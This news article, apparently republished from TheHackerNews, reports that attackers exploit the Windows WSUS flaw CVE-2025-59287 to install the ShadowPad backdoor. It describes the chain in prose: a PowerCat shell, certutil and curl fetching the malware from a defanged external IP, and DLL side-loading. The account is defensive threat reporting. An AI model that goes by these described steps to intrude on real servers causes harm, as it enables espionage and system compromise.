A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) now creates fresh concerns, since threat actors actively exploit it to distribute the malware known as ShadowPad.
“The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access,” AhnLab Security Intelligence Center (ASEC) said in a report published last week. “They then used PowerCat, an open-source PowerShell-based Netcat utility, to obtain a system shell (CMD). Subsequently, they downloaded and installed ShadowPad using certutil and curl.”
ShadowPad, which researchers assess as a successor to PlugX, operates as a modular backdoor widely used by Chinese state-sponsored hacking groups. It first emerged in 2015. In an analysis published in August 2021, SentinelOne called it a “masterpiece of privately sold malware in Chinese espionage.”
CVE-2025-59287, which Microsoft addressed last month, refers to a critical deserialization flaw in WSUS that threat actors now exploit to achieve remote code execution with system privileges.
Since the patch became available, attackers increasingly rely on this vulnerability to obtain initial access to publicly exposed WSUS instances, conduct reconnaissance, and even drop legitimate tools like Velociraptor.
ShadowPad installed via CVE-2025-59287 exploit
In the attack documented by the South Korean cybersecurity company, the attackers weaponize the vulnerability to launch Windows utilities like “curl.exe” and “certutil.exe” so they can contact an external server (“149.28.78[.]189:42306“) to download and install ShadowPad.
ShadowPad, similar to PlugX, launches by means of DLL side-loading and leverages a legitimate binary (“ETDCtrlHelper.exe“) to execute a DLL payload (“ETDApix.dll“), which serves as a Memory-resident loader that executes the Backdoor.
Once attackers install the malware, it launches a core module that loads other plugins Embedded in the Shellcode into memory. The malware also incorporates a variety of Anti-detection and Persistence techniques. However, analysts still cannot attribute the activity to any known threat actor or group.
“After the proof-of-concept (PoC) exploit code for the vulnerability was publicly released, attackers quickly weaponized it to distribute ShadowPad malware via WSUS servers,” AhnLab said. “This vulnerability is critical because it allows remote code execution with system-level permission, significantly increasing the potential impact.”
Source: TheHackerNews
Read more at Impreza News
